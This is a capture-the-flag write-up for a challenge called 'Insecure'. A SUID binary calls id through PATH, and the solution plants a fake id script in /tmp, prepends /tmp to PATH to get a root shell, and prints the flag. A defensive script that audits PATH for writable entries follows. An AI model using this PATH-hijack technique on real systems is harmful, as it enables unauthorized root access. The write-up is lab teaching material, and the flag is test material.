Insecure (100)
Privilege escalation through SUID files and PATH variable manipulation

Problem

Someone once told me that SUID is a bad idea. Could you show me why?
Attachment: insecure (7KB, binary)

Solution

The binary calls the id command three times: first without privileges, then as root, then again without privileges.
Because the SUID flag is set and id is looked up through the PATH variable, we can prepend a directory we control to PATH and have our own code run whenever id is called. The goal is to read the flag.txt file, which requires root access, so we need to spawn a shell as root.
The following bash script spawns the shell only if the caller is root:

    if [ `/bin/id -u` = "0" ]; then
        echo "I am root" && /bin/bash
    else
        echo "I am not root"
    fi

Translating this into a one-liner and creating our malicious id payload:

    $ echo "if [ \`/bin/id -u\` = \"0\" ]; then echo \"I am root\" && /bin/bash; else echo \"I am not root\"; fi" > id

PATH variable manipulation:

    $ cd /tmp
    $ echo "if [ \`/bin/id -u\` = \"0\" ]; then echo \"I am root\" && /bin/bash; else echo \"I am not root\"; fi" > id
    $ chmod 777 id
    $ export PATH=/tmp:$PATH

After running insecure, we obtain a root shell:

    I am not root
    I am root

    $ cat /flag.txt
    DSO-NUS{b4fcfe57b8d2b05ff3310c663a0497b1026cf039baeee18669957152cdc276da}
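
From the defender's side, the lookup this solution relies on can be audited before a privileged program ever runs. The following is an added example, not part of the original writeup or the challenge binary: it walks a PATH string in search order and reports when a world-writable or relative entry either supplies the command or is searched before the trusted copy. The function name audit_path_lookup and the demo directories are assumptions made for illustration.

```shell
#!/bin/sh
# Audit how a bare command name (such as "id") resolves through a PATH string.
# Returns 1 if an attacker-writable or relative entry supplies the command or
# is searched before the trusted copy; returns 0 otherwise.
audit_path_lookup() (
    cmd=$1
    path_string=${2-$PATH}
    status=0
    IFS=:     # split on ":"; the subshell body keeps IFS and set -f local
    set -f    # do not glob-expand PATH entries
    for dir in $path_string; do
        reason=
        case $dir in
            /*) mode=$(ls -ldL "$dir" 2>/dev/null) || mode=
                # character 9 of the mode string is the "other write" bit
                case $mode in
                    d???????w*) reason="world-writable directory" ;;
                esac ;;
            *)  reason="relative or empty entry, searched in the current directory" ;;
        esac
        candidate=${dir:-.}/$cmd
        if [ -f "$candidate" ] && [ -x "$candidate" ]; then
            if [ -n "$reason" ]; then
                echo "SHADOWED: $cmd -> $candidate [$reason]"
                status=1
            else
                echo "RESOLVED: $cmd -> $candidate"
            fi
            break
        fi
        if [ -n "$reason" ]; then
            echo "PLANTABLE: ${dir:-.} is searched before $cmd [$reason]"
            status=1
        fi
    done
    [ "$status" -eq 0 ]
)

# Constructed demo: a mode-777 directory ahead of a trusted one, each holding
# a harmless stand-in "id" that only prints a marker.
demo_dir=$(mktemp -d)
mkdir "$demo_dir/front" "$demo_dir/trusted"
chmod 777 "$demo_dir/front"; chmod 755 "$demo_dir/trusted"
for d in front trusted; do
    printf '#!/bin/sh\necho stand-in\n' > "$demo_dir/$d/id"
    chmod 755 "$demo_dir/$d/id"
done
audit_path_lookup id "$demo_dir/front:$demo_dir/trusted" || echo "=> unsafe order"
audit_path_lookup id "$demo_dir/trusted:$demo_dir/front" && echo "=> safe order"
```

The audit only describes the environment; a SUID program itself should call helpers by absolute path and set its own PATH rather than inherit the caller's.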